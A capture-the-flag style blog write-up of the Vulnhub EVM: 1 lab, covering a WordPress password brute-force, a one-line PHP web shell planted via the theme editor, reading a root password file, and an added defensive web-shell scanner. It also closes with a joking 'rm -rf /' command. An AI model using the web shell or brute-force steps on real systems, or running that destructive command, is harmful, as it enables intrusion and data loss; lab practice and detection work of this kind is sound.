Vulnhub - EVM: 1
Introduction
This is super friendly box intended for Beginner’s
This may work better with VirtualBox than VMware
– note: some of the spelling and punctuation errors on this blog are mine; but if I quoted something (like above), I tend to quote it verbatim, even if I know it’s incorrect.
This box is on the NetSecFocus Admin list of OSCP-like machines. It’s EVM: 1 from vulnhub.
Network Setup
I run my Kali as a VM on a Windows host, in Bridged mode. And that’s how I like it. This machine (and, I’m now realising, some others) doesn’t like it. It’s set up for Host Only. But if I run Host Only, then Kali can’t see it, unless I reconfigure Kali, which I don’t want to do. Ugh.
Ports
Anyway, this one has SMB, POP3, HTTP, SSH. This won’t be a very detailed writeup; I’m tired and mildly frustrated. Full disclosure: I’m currently roadblocked on two other boxes.
HTTP
The webserver is running wordpress at /wordpress and we can get some creds:
root@kali:/opt/vulnhub/evm# wpscan --url http://192.168.1.105/wordpress --ignore-main-redirect -U 'c0rrupt3d_brain' -P /usr/share/wordlists/rockyou.txt
See the redirect? That’s because I did this in Bridged mode but it keeps trying to go back to the Host Only IP it’s been set up with - 192.168.56.103. Also I ran -e first to get the username. Anyway:
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - c0rrupt3d_brain / 24992499 Trying c0rrupt3d_brain / 24992499 Time: 00:13:05 < (10700 / 14355093) 0.07% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: c0rrupt3d_brain, Password: 24992499
Using these credentials we should be able to log in to Wordpress, but it just would not work in Bridged mode - just constant redirects. Grrr.
Host Only
I switched the VM to Host Only and went over to Windows to see if I could continue without too much bother.
Visiting wp-admin I could log in easily, so that’s a start. I decided to try the theme code editing for once - it worked like a charm and in fact had been set up for this attack. I put
<?php system($_GET['cmd']);?>
into
http://192.168.56.103/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentynineteen
and had RCE at:
http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/404.php?cmd=
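The theme editor only works because file editing is left enabled; `define('DISALLOW_FILE_EDIT', true);` in wp-config.php switches it off. As an added example (my code, not the author's or WordPress's), here is a small scanner that walks a themes directory and flags the one-line shell pattern used above, with a constructed sample tree standing in for wp-content/themes:

```python
import re
import tempfile
from pathlib import Path

# Command/code sinks fed directly from a request superglobal: the shape of the
# one-liner planted through the theme editor, system($_GET['cmd']).
SINKS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
SUPERGLOBALS = r"\$_(?:GET|POST|REQUEST|COOKIE)"
WEBSHELL_RE = re.compile(rf"\b{SINKS}\s*\(\s*{SUPERGLOBALS}\s*\[", re.IGNORECASE)


def scan_theme_dir(root):
    """Return (relative path, line number, line) for every PHP line under
    root that passes request input straight into a code or command sink."""
    root = Path(root)
    hits = []
    for path in sorted(root.rglob("*.php")):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        for lineno, line in enumerate(text.splitlines(), start=1):
            if WEBSHELL_RE.search(line):
                hits.append((path.relative_to(root).as_posix(), lineno, line.strip()))
    return hits


# Constructed sample tree (not taken from the box): one tampered 404.php as in
# the writeup, one untouched 404.php, and a functions.php that sanitises input.
SAMPLE_FILES = {
    "twentynineteen/404.php": "<?php system($_GET['cmd']);?>\n<?php get_header(); ?>\n",
    "twentytwenty/404.php": "<?php get_header(); ?>\n<h1>Not found</h1>\n",
    "twentytwenty/functions.php": "<?php\n$q = sanitize_text_field($_GET['s'] ?? '');\n",
}


def build_sample_tree():
    """Write the constructed sample files to a temp dir and return its path."""
    base = Path(tempfile.mkdtemp(prefix="wp-themes-"))
    for rel, content in SAMPLE_FILES.items():
        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return base


def demo():
    """Scan the sample tree; only the tampered 404.php should be reported."""
    return scan_theme_dir(build_sample_tree())


if __name__ == "__main__":
    for rel, lineno, line in demo():
        print(f"{rel}:{lineno}: {line}")
```

Pointing scan_theme_dir at a real wp-content/themes directory, or diffing it against a pristine copy of the theme, is the quick check after any suspected admin-credential compromise.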
Shell
Lol, no. I’ve got Ubuntu running on WSL (version 1, not the apparently better version 2) with netcat installed but I couldn’t get it to catch a reverse shell and I couldn’t be bothered mucking about too much. Simple manual enumeration was enough:
http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/404.php?cmd=cat%20/home/root3r/.root_password_ssh.txt
willy26
For some reason I couldn’t SSH in from Windows, either from Powershell OR from Ubuntu WSL. F***.
So I just went and put the creds straight into the login on the running VM:
root@ubuntu-extermely-vulnerable-m4ch1ine:~# cd /root/
root@ubuntu-extermely-vulnerable-m4ch1ine:~# cd cat proof.txt
voila you have successfully pwned me :) !!!
:D
I guess that was that. Man, that would have been so much easier without the network issues. I’m assuming there are probably multiple ways to do this box. I might try it again later with a Host Only Kali. But probably not.
In the meantime I’m going to give it one of these:
rm -rf / --no-preserve-root